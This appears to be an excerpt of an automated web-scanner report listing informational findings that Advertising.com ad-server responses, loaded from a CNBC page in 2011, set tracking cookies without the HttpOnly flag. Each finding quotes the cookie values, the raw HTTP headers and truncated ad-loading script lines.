Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

F1=B8iR63EBAAAABAAAAsAAOCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
BASE=x7Q9Ui23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
ROLL=U6APEjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFP!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:06:39 GMT; path=/
90208788=_4dfa462f,2878613427,768033^981602^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=90827809/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=Lsk+NFJwHob0Fo6sIWwJoaQjtKPCC0nReJpwEg02FZMBdbdRGTwihXkxEwjmGZMBxGeRGTAQvakxEQW4FZMBLppRGTQghXkxEgN5FZMB6ijRGTAmhXkxEAY4FZMBdDmRGTA/yakxEAVZGZMBYimRGTA3WakxEQY4FZMBFGeRGTAxBakxEU1aGZMBbTeRGTQwBakxEYnXGZMBWGoRGTgQvakxEogmGZMBxmpRGTQRgakxE0soGZMB8mpRGHZAmZOiGlZj0jw+NXwbtiGA8Moxk7a+AcsmGTuAEOphBbLuBoKuGn/smJwokaYwzClALRqhBXaxAMdPGUwrQQwdIaghq62ApVmxvTqHIUbNG/GsDiAzPaAc; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
F1=BswS63EBAAAABAAAAABAGCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
BASE=x7Q9Zi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nW5shGrOE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
ROLL=U6APJjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9aooALZ9dH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
90827809=_4dfa4b0b,8104060413,768033^1029730^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1029730.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:27:22 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 609
Date: Thu, 16 Jun 2011 18:27:23 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=Lsk+NFJwHob0Fo6sIWwJoaQjtKPCC0nReJpwEg02FZMBdbdRGTwihXkxEwjmGZMBxGeRGTAQvakxEQW4FZMBLppRGTQghXkxEgN5FZMB6ijRGTAmhXkxEAY4FZMBdDmRGTA/yakxEAVZGZMBYimRGTA3WakxEQY4FZMBFGeRGTAxBakxEU1aGZMBbTeRGTQwBakxEYnXGZMBWGoRGTgQvakxEogmGZMBxmpRGTQRgakxE0soGZMB8mpRGHZAmZOiGlZj0jw+NXwbtiGA8Moxk7a+AcsmGTuAEOphBbLuBoKuGn/smJwokaYwzClALRqhBXaxAMdPGUwrQQwdIaghq62ApVmxvTqHIUbNG/GsDiAzPaAc; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: F1=BswS63EBAAAABAAAAABAGCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: BASE=x7Q9Zi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nW5shGrOE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: ROLL=U6APJjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9aooALZ9dH!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:27:22 GMT; path=/
Set-Cookie: 90827809=_4dfa4b0b,8104060413,768033^1029730^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N5865.126262.AOLPERFORMANCENETWO/B5551575.40;sz=300x250;click=http://r1-ads.ace.advertising.com/click/site=0000768
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=91953648/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=u6k+NFJwHob0Fl6sIWwJoaEjtKPCC0nhdJpwEg02FWMBdbdhFTwihXYxEwjmGWMBxGehFTAQvaYxEQW4FWMBLpphFTQghXYxEgN5FWMB6ijhFTAmhXYxEAY4FWMBdDmhFTA/yaYxEAVZGWMBYimhFTA3WaYxEQY4FWMBFGehFTAxBaYxEU1aGWMBbTehFTQwBaYxEYnXGWMBWGohFTgQvaYxEogmGWMBxmphFTQRgaYxE0soGWMB8mphFHZAmZOiGiZj0jw+NXkbtiGA8MoBk7a+AcsmGQuAEOpxAbLuBoKuGk/smJwokaMwzClALRqxAXaxAMdPGRwrQQwdIaUhq62ApVmBvTqHIUbNG8WtrCQIzaAJ; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
F1=B4qT63EBAAAABAAAAMBAACA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
BASE=x7Q9ci23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5KdseJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
ROLL=U6APMjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
91953648=_4dfa4eae,2076607817,768033^944664^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.944664.768033.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:42:54 GMT
Content-Type: application/x-javascript; charset=utf-8
Vary: Accept-Encoding
Date: Thu, 16 Jun 2011 18:42:54 GMT
Content-Length: 1055
Connection: close
Set-Cookie: C2=u6k+NFJwHob0Fl6sIWwJoaEjtKPCC0nhdJpwEg02FWMBdbdhFTwihXYxEwjmGWMBxGehFTAQvaYxEQW4FWMBLpphFTQghXYxEgN5FWMB6ijhFTAmhXYxEAY4FWMBdDmhFTA/yaYxEAVZGWMBYimhFTA3WaYxEQY4FWMBFGehFTAxBaYxEU1aGWMBbTehFTQwBaYxEYnXGWMBWGohFTgQvaYxEogmGWMBxmphFTQRgaYxE0soGWMB8mphFHZAmZOiGiZj0jw+NXkbtiGA8MoBk7a+AcsmGQuAEOpxAbLuBoKuGk/smJwokaMwzClALRqxAXaxAMdPGRwrQQwdIaUhq62ApVmBvTqHIUbNG8WtrCQIzaAJ; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
Set-Cookie: F1=B4qT63EBAAAABAAAAMBAACA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
Set-Cookie: BASE=x7Q9ci23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkUxjdUyksh8ICJaK3qk5KdseJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
Set-Cookie: ROLL=U6APMjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3J03tHf2is4HpOTQpM6s5GotJ!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:42:54 GMT; path=/
Set-Cookie: 91953648=_4dfa4eae,2076607817,768033^944664^1183^0,0_; domain=advertising.com; path=/click

document.write('<iframe src="http://view.atdmt.com/AVE/iview/285783663/direct;wi.300;hi.250/01/2076607817?click=http://r1-ads.ace.advertising.com/click/site=0000768033/mnum=0000944664/cstr=91953648=_4
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768033/size=300250/u=2/bnum=9352727/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

F1=BIbP63EBAAAABAAAAcAAcCA; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
BASE=x7Q9Ri23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9O!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
ROLL=U6APAjemptEW07uaB4l2FnB!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
9352727=_4dfa3db2,2540351573,768033^956559^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=12937368/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=y2j+NFJwHob0Fz6sIWwJoa8jtKPCC0nBhJpwEg02FkMBdbdBJTwihXQyEwjmGkMBxGeBJTAQvaQyEQW4FkMBLppBJTQghXQyEgN5FkMB6ijBJTAmhXQyEAY4FkMBdDmBJTA/yaQyEAVZGkMBYimBJTA3WaQyEQY4FkMBFGeBJTAxBaQyEU1aGkMBbTeBJTQwBaQyEYnXGkMBWGoBJTgQvaQyEogmGkMBxmpBJTQRgaQyE0soGkMB8mpBJHZAmZOiGwZj0jw+NXActiGA8Mohn7a+AcsmGeuAEOpREbLuBoKuGy/smJwokaExzClALRqREXaxAMdPGfwrQQwdIaMi; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
F1=BIbP63EBAAAABAAAAYAAcCA; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
BASE=x7Q9Ri23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Bbf0hn7jx9fCFhyHZGl9O!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
ROLL=U6APDjemptEW07O!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
12937368=_4dfa3db2,0386523300,768034^956561^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.956561.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 17:30:26 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 667
Date: Thu, 16 Jun 2011 17:30:26 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=y2j+NFJwHob0Fz6sIWwJoa8jtKPCC0nBhJpwEg02FkMBdbdBJTwihXQyEwjmGkMBxGeBJTAQvaQyEQW4FkMBLppBJTQghXQyEgN5FkMB6ijBJTAmhXQyEAY4FkMBdDmBJTA/yaQyEAVZGkMBYimBJTA3WaQyEQY4FkMBFGeBJTAxBaQyEU1aGkMBbTeBJTQwBaQyEYnXGkMBWGoBJTgQvaQyEogmGkMBxmpBJTQRgaQyE0soGkMB8mpBJHZAmZOiGwZj0jw+NXActiGA8Mohn7a+AcsmGeuAEOpREbLuBoKuGy/smJwokaExzClALRqREXaxAMdPGfwrQQwdIaMi; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
Set-Cookie: F1=BIbP63EBAAAABAAAAYAAcCA; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
Set-Cookie: BASE=x7Q9Ri23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Bbf0hn7jx9fCFhyHZGl9O!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
Set-Cookie: ROLL=U6APDjemptEW07O!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:30:26 GMT; path=/
Set-Cookie: 12937368=_4dfa3db2,0386523300,768034^956561^1183^0,0_; domain=advertising.com; path=/click

document.write('<script language="JavaScript" type="text/javascript" src="http://view.atdmt.com/TLC/jview/242390407/direct/01?click=http://r1-ads.ace.advertising.com/click/site=0000768034/mnum=0000956
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=16141575/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=Cxk+NFJwHob0Fn6sIWwJoaMjtKPCC0nBeJpwEg02FYMBdbdBGTwihXgxEwjmGYMBxGeBGTAQvagxEQW4FYMBLppBGTQghXgxEgN5FYMB6ijBGTAmhXgxEAY4FYMBdDmBGTA/yagxEAVZGYMBYimBGTA3WagxEQY4FYMBFGeBGTAxBagxEU1aGYMBbTeBGTQwBagxEYnXGYMBWGoBGTgQvagxEogmGYMBxmpBGTQRgagxE0soGYMB8mpBGHZAmZOiGkZj0jw+NXsbtiGA8Mohk7a+AcsmGSuAEOpRBbLuBoKuGm/smJwokaUwzClALRqRBXaxAMdPGTwrQQwdIachq62ApVmhvTqHIUbNG+G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
F1=BIET63EBAAAABAAAAEBAECA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
BASE=x7Q9ai23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkeCsdUykM!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
ROLL=U6APOjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3DH4tHf2C!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
16141575=_4dfa4c42,7722412680,768034^994447^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.994447.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:32:34 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 602
Date: Thu, 16 Jun 2011 18:32:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=Cxk+NFJwHob0Fn6sIWwJoaMjtKPCC0nBeJpwEg02FYMBdbdBGTwihXgxEwjmGYMBxGeBGTAQvagxEQW4FYMBLppBGTQghXgxEgN5FYMB6ijBGTAmhXgxEAY4FYMBdDmBGTA/yagxEAVZGYMBYimBGTA3WagxEQY4FYMBFGeBGTAxBagxEU1aGYMBbTeBGTQwBagxEYnXGYMBWGoBGTgQvagxEogmGYMBxmpBGTQRgagxE0soGYMB8mpBGHZAmZOiGkZj0jw+NXsbtiGA8Mohk7a+AcsmGSuAEOpRBbLuBoKuGm/smJwokaUwzClALRqRBXaxAMdPGTwrQQwdIachq62ApVmhvTqHIUbNG+G; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: F1=BIET63EBAAAABAAAAEBAECA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: BASE=x7Q9ai23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4vocFHNEzrEdRL7ixf0OXuHQy3nGGuhGrOkeCsdUykM!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: ROLL=U6APOjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2ewWp6Dkc9UB0fhTc7MO3Ile9a4XCLZ9d3DH4tHf2C!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:32:34 GMT; path=/
Set-Cookie: 16141575=_4dfa4c42,7722412680,768034^994447^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N6333.272756.AOL-ADVERTISING/B5305142.3;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=0000768034/mn
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=1625138/hr=12/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=/Ok+NFJwHob0Fu6sIWwJoaojtKPCC0nxfJpwEg02FfMBdbdxHTwihX8xEwjmGfMBxGexHTAQva8xEQW4FfMBLppxHTQghX8xEgN5FfMB6ijxHTAmhX8xEAY4FfMBdDmxHTA/ya8xEAVZGfMBYimxHTA3Wa8xEQY4FfMBFGexHTAxBa8xEU1aGfMBbTexHTQwBa8xEYnXGfMBWGoxHTgQva8xEogmGfMBxmpxHTQRga8xE0soGfMB8mpxHHZAmZOiGrZj0jw+NXsbtiGA8MoRm7a+AcsmGZuAEOpBDbLuBoKuGt/smJwokawwzClALRqBDXaxAMdPGawrQQwdIa4h; domain=advertising.com; expires=Sat, 15-Jun-2013 17:56:15 GMT; path=/
F1=B87Q63EBAAAABAAAAgAASCA; domain=advertising.com; expires=Sat, 15-Jun-2013 17:56:15 GMT; path=/
BASE=x7Q9Si23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1A!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:56:15 GMT; path=/
ROLL=U6APBjemptEW07uaB4l2FnxkoJDmaLF!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:56:15 GMT; path=/
1625138=_4dfa43bf,0557655566,768034^924217^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.924217.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 17:56:15 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 604
Date: Thu, 16 Jun 2011 17:56:15 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: C2=/Ok+NFJwHob0Fu6sIWwJoaojtKPCC0nxfJpwEg02FfMBdbdxHTwihX8xEwjmGfMBxGexHTAQva8xEQW4FfMBLppxHTQghX8xEgN5FfMB6ijxHTAmhX8xEAY4FfMBdDmxHTA/ya8xEAVZGfMBYimxHTA3Wa8xEQY4FfMBFGexHTAxBa8xEU1aGfMBbTexHTQwBa8xEYnXGfMBWGoxHTgQva8xEogmGfMBxmpxHTQRga8xE0soGfMB8mpxHHZAmZOiGrZj0jw+NXsbtiGA8MoRm7a+AcsmGZuAEOpBDbLuBoKuGt/smJwokawwzClALRqBDXaxAMdPGawrQQwdIa4h; domain=advertising.com; expires=Sat, 15-Jun-2013 17:56:15 GMT; path=/
Set-Cookie: F1=B87Q63EBAAAABAAAAgAASCA; domain=advertising.com; expires=Sat, 15-Jun-2013 17:56:15 GMT; path=/
Set-Cookie: BASE=x7Q9Si23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jx9fCFhyHZGl9Opr8TEX1A!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:56:15 GMT; path=/
Set-Cookie: ROLL=U6APBjemptEW07uaB4l2FnxkoJDmaLF!; domain=advertising.com; expires=Sat, 15-Jun-2013 17:56:15 GMT; path=/
Set-Cookie: 1625138=_4dfa43bf,0557655566,768034^924217^1183^0,0_; domain=advertising.com; path=/click

document.write('<SCRIPT language=\'JavaScript1.1\' SRC="http://ad.doubleclick.net/adj/N4538.126262.AOLPERFORMANCENETWO/B2304017.6;sz=728x90;click=http://r1-ads.ace.advertising.com/click/site=000076803
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r1-ads.ace.advertising.com
Path:	/site=768034/size=728090/u=2/bnum=27582677/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

C2=dik+NFJwHob0Fq6sIWwJoaYjtKPCC0nxeJpwEg02FbMBdbdxGTwihXsxEwjmGbMBxGexGTAQvasxEQW4FbMBLppxGTQghXsxEgN5FbMB6ijxGTAmhXsxEAY4FbMBdDmxGTA/yasxEAVZGbMBYimxGTA3WasxEQY4FbMBFGexGTAxBasxEU1aGbMBbTexGTQwBasxEYnXGbMBWGoxGTgQvasxEogmGbMBxmpxGTQRgasxE0soGbMB8mpxGHZAmZOiGnZj0jw+NX4btiGA8MoRl7a+AcsmGVuAEOpBCbLuBoKuGp/smJwokagwzClALRqBCXaxAMdPGWwrQQwdIaoh; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
F1=B0JS63EBAAAABAAAA0AAKCA; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
BASE=x7Q9Wi23SwnkpMdYS8Ne5ru2BcaVK0Bv+k2PmTntoWJelwznY4jXxpCBEQvy2vvEbS3CqqiFiBEZTN3f2B0eLPd/um1PETsGuYvL8A8d0iDEOliUSEDbOxBFe8Zbf0hn7jp9fCFhyHZGl9Opr8TEX1wZjCzrmH356TZtDQXim3se4voCFHNEzrE!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
ROLL=U6APKjemptEW07uaB4l2FnxkoJDmaLF0BZFCNJJmI4r/kefeO05CNFPBGckTh2euWp6DkcN!; domain=advertising.com; expires=Sat, 15-Jun-2013 18:17:01 GMT; path=/
27582677=_4dfa489d,2306156771,768034^1004441^1183^0,0_; domain=advertising.com; path=/click

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP="NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV", an.n="Advertising.com", an.pp="http://advertising.aol.com/privacy/advertisingcom", an.oo="http://advertising.aol.com/privacy/advertisingcom/opt-out", an.by="Y"
Comscore: CMXID=2115.1004441.768034.0XMC
Cache-Control: private, max-age=0, no-cache
Expires: Thu, 16 Jun 2011 18:17:01 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 641
Date: Thu, 16 Jun 2011 18:17:01 GMT
Connection: close
Vary: Accept-Encoding
